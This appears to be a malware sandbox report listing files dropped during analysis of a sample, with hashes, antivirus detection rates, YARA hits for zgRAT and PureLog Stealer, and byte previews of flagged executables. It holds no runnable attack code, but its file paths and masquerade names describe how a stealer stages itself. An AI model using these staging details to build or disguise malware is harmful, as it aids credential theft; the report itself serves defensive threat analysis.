                                                                                                                                                                              Preview:MDMP..a..... ........M.f....................................<....(...........)......t?..............l.......8...........T...........8Z..............$4...........6..............................................................................eJ.......6......Lw......................T............M.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):8816
                                                                                                                                                                              Entropy (8bit):3.700786015847611
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:R6l7wVeJ9Ob6YvncVFWgmfZeEDEprF89bFxkfg3m:R6lXJ0b6YvcmgmfnDDFCfN
                                                                                                                                                                              MD5:7A82AAFDA6A595A9EE1EDEE88912D4B8
                                                                                                                                                                              SHA1:B25DBB18D6BF541600B9F8620B7CD78EA09448F0
                                                                                                                                                                              SHA-256:B1664ED55BCDF5E9638F9459EF11628176BF680F869B59F1291DCA39F3271E50
                                                                                                                                                                              SHA-512:9B030010038F4B96D7BCBA0DD1A8FFEC18C768D7B23ABB3F03F1BB12B67861DFFF1E3FBED362235574BCA897A4AB7467036C8E1FB2209298BF6B3369DD0170C2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.7.6.<./.P.i.
                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4843
                                                                                                                                                                              Entropy (8bit):4.480785349702387
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:uIjfAI7Qd7VIJXS1FWl1CyfEVc3AcyTXd:uIkYQd76XS1E1rwc3AcGt
                                                                                                                                                                              MD5:748D591357981048AB19F49EC96DFE42
                                                                                                                                                                              SHA1:502BE84B86C4E3F5DD6EC9E48E14AD3AB38D1146
                                                                                                                                                                              SHA-256:1A118AD6839FCFE84CB34DDC11DD1CDF67E9BCCD24F4E4E2389B98162A8C3B79
                                                                                                                                                                              SHA-512:D61CBD17B8B867C9A2D4CED3C63916C52FA210B0E5B9BC801ACB706B6F2CCDE2BE880639A5DF63DA43FC18EA8493582604FF8A50B26184C1AE1252D5BF6D5C35
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="436319" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):81646
                                                                                                                                                                              Entropy (8bit):3.023750456609559
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:2eV09TSv7Y4KJiAT8q8D/Y1RyPzIk1oZ+G6RPIzx990HicqnOc/G:2eusv7Y4KJNr8c7EUcoQ1Idf8icqOc/G
                                                                                                                                                                              MD5:2E03841FFC9DBB645B145AE30623EF5D
                                                                                                                                                                              SHA1:FB877370C1FCCEA3DDBD5658A06706C00B9E8CBB
                                                                                                                                                                              SHA-256:470D682D28971097A4EA0C5E756B584A6D9DEC90DD04390F64090C475E1C19B0
                                                                                                                                                                              SHA-512:8D5394296B78AFBD9C0C8BCD790B7DE1B64431E706F208BF17EBF796A53BEF9F80EAE429934D4C850ED44F8E8B880E201B2FBD75083BAB37C9B1A90D53295891
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):13340
                                                                                                                                                                              Entropy (8bit):2.685129210354656
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:TiZYWD3l0C5oUoMYDYnWn8HSUYEZ4StEix4CyawuH2bRaK3yM684Ivc3:2ZDTEM0NQWVaK3yM68fvc3
                                                                                                                                                                              MD5:31332DB8CE56D85914A63C812AB13DB4
                                                                                                                                                                              SHA1:4FD7CE3CC41EFE99593AC2E74987E302E643FE28
                                                                                                                                                                              SHA-256:22F7DB04FF6AFB89B644D40FD8FED5B771EC213DFDD78CE31DB04714D94F8F4A
                                                                                                                                                                              SHA-512:CDC7B459EFF9440680EB649826998D83D147BB4544756628A8145B3096BECB34E5822703475AA74F1F3C88C31113AC47ADAA59A1A7784D3AFB6A471F7DA830B0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):6171507
                                                                                                                                                                              Entropy (8bit):7.989540814911256
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:98304:CimoDUN43WlaEBjOjFgFEblNHYSxTpirSHcUR43zrwkdA8QJCKC7bN3mb6aunM6y:CiumWf9OjmFwDRxtYSHdK34kdai7bN3G
                                                                                                                                                                              MD5:10D45FBCAC1C3CCF126754680E91E0E2
                                                                                                                                                                              SHA1:4FA6B7803EEEDC7E67B93754E6ABDC55F1E6D1A1
                                                                                                                                                                              SHA-256:E850A4C7A5F7D933FB70A9E8AA138C2B777390AFCCDCE6F9C4514046C931C8BE
                                                                                                                                                                              SHA-512:270DD0B62E00C280EA60D399E1A9BB8DA10D35BE16797564A67F169B83042754DDFCF5E05B27AE75404C077329FE194800563A2BFBCC1011A5F91E609867521E
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 51%
                                                                                                                                                                              • Antivirus: Virustotal, Detection: 47%, Browse
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc...[hc..`.Qhc..g.Ihc..f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d....8.f.........."....(.....l.................@....................................N.]...`.................................................l...x.......T....`..."....]..<......h.......................................@...............P............................text............................... ..`.rdata..B&.......(..................@..@.data....s..........................@....pdata..."...`...$..................@..@.rsrc...T...........................@..@.reloc..h...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):11662615
                                                                                                                                                                              Entropy (8bit):7.996772653002528
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:196608:QCUDfyGowBdnpkYRMZqsrMELkmHe/tQK3j3fxIyAN7z7FUqVYwD7XmL:QDfDoc6Y6/km6GyxgN7zZFVr7X
                                                                                                                                                                              MD5:FC445049713C02F9A9DDAA62E404C9E9
                                                                                                                                                                              SHA1:8BCFA380451D9B71B4933E28C9FFB6710D12323E
                                                                                                                                                                              SHA-256:B39448F8013728D904A44A3FA4C510539D3FDD2AA35A1355D49E0343852A8556
                                                                                                                                                                              SHA-512:14C81AAD762CA16024A35799783F22D244FB88BCC350BEAC27E00CC54B36E822E5FDDDC7CAE414A8A08ED93E2BB93F765C4D2CB3869D552003F9F80B4AD869C4
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                              • Antivirus: Virustotal, Detection: 62%, Browse
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?.........................PE..d....+.f.........."....%.....p.................@....................................b%....`.....................................................x....`..e.... ..."...........p..X... ..................................@............... ............................text............................... ..`.rdata...-..........................@..@.data...H3..........................@....pdata..."... ...$..................@..@_RDATA..\....P......................@..@.rsrc...e....`......................@..@.reloc..X....p......................@..B................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):5617152
                                                                                                                                                                              Entropy (8bit):7.71585644239634
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
                                                                                                                                                                              MD5:1274CBCD6329098F79A3BE6D76AB8B97
                                                                                                                                                                              SHA1:53C870D62DCD6154052445DC03888CDC6CFFD370
                                                                                                                                                                              SHA-256:BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
                                                                                                                                                                              SHA-512:A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                              • Antivirus: Virustotal, Detection: 79%, Browse
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4042529
                                                                                                                                                                              Entropy (8bit):7.700603596238004
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:98304:yxbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6j:4bbi1IXr5nmG9Hb7VmX86j
                                                                                                                                                                              MD5:45C59202DCE8ED255B4DBD8BA74C630F
                                                                                                                                                                              SHA1:60872781ED51D9BC22A36943DA5F7BE42C304130
                                                                                                                                                                              SHA-256:D07C47F759245D34A5B94786637C3D2424C7E3F3DEA3D738D95BF4721DBF3B16
                                                                                                                                                                              SHA-512:FFF5B16AE38681ED56782C0F0423560DAB45065685D7272424206F43C80486318180AA22D66BD197C8C530E4C24DBAAAA020BEB76B619DC767EE59FAA27E23ED
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\svchost.exe, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\svchost.exe, Author: Joe Security
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                              • Antivirus: Virustotal, Detection: 53%, Browse
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (306), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):306
                                                                                                                                                                              Entropy (8bit):5.771332677552242
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:+LFqg1dTqa306R+gBmekzQ0UINdYyhKOEqRkXUOWdYP5yPzTTH2yB:+5lsa3VRBBmv81INaqR856Hr
                                                                                                                                                                              MD5:E7792C04142D7E22E208EFE5B3DBF65D
                                                                                                                                                                              SHA1:5679BEAC26745C5AF2371A1D3430E1D5AC5083FC
                                                                                                                                                                              SHA-256:4C6D42E1315469EB6B6B949A2C5643DF1E2206BAF97E8A1764CBB8F514B95CF1
                                                                                                                                                                              SHA-512:C0598BC654D02BAEBA63E1E9AAB2D82A7FE50C4A3B25E5C3D5994CC0606EC60ACA3D2671C327EAC1700DF6B0707CE0962A22539A979C21E87F2FB6C0B33FB3B0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:4NInpJOzWiEaLMMMEa8pJ6JJuJEj7wtOcRLEbieogrRRF6Xlr3SQLHJ7D83fEp1kzz83BIug6UJbp2Exvd1EdcCVHNAdp8j1zrcP8dkjJwU17rSL4FulxxGXxmvxHQ07uSm8ayzR2S5qHLYa5yjkO7DCkEcVrwb26WGoFUvFPcte2ZPlOV2TrQtxOkXVWejG1CuvEtVkDeUvOjKLz0GW3ILpmTZf7asu2nnzodhfARPN68ipaLffYNMs1FIvT0nmvj2l6UgVTkVm27touuEv4MWpa48iVvLKonbWF7tFoJMx1k03Wd
                                                                                                                                                                              Process:C:\Users\user\Desktop\87Bym0x4Fy.exe
                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):425
                                                                                                                                                                              Entropy (8bit):5.357964438493834
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
                                                                                                                                                                              MD5:D8F8A79B5C09FCB6F44E8CFFF11BF7CA
                                                                                                                                                                              SHA1:669AFE705130C81BFEFECD7CC216E6E10E72CB81
                                                                                                                                                                              SHA-256:91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
                                                                                                                                                                              SHA-512:C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1915
                                                                                                                                                                              Entropy (8bit):5.363869398054153
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
                                                                                                                                                                              MD5:0C47412B6C6EF6C70D4B96E4717A5D3B
                                                                                                                                                                              SHA1:666FCC7898B52264D8A144600D7A3B0B59E39D66
                                                                                                                                                                              SHA-256:0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
                                                                                                                                                                              SHA-512:4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                                                                                                                                              Process:C:\Users\user\cscript.exe
                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):847
                                                                                                                                                                              Entropy (8bit):5.354334472896228
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                                                                              MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                                                                              SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                                                                              SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                                                                              SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):19253
                                                                                                                                                                              Entropy (8bit):5.005753878328145
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
                                                                                                                                                                              MD5:81D32E8AE893770C4DEA5135D1D8E78D
                                                                                                                                                                              SHA1:CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
                                                                                                                                                                              SHA-256:6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
                                                                                                                                                                              SHA-512:FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:@...e...........................................................
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):696396
                                                                                                                                                                              Entropy (8bit):7.92487074127059
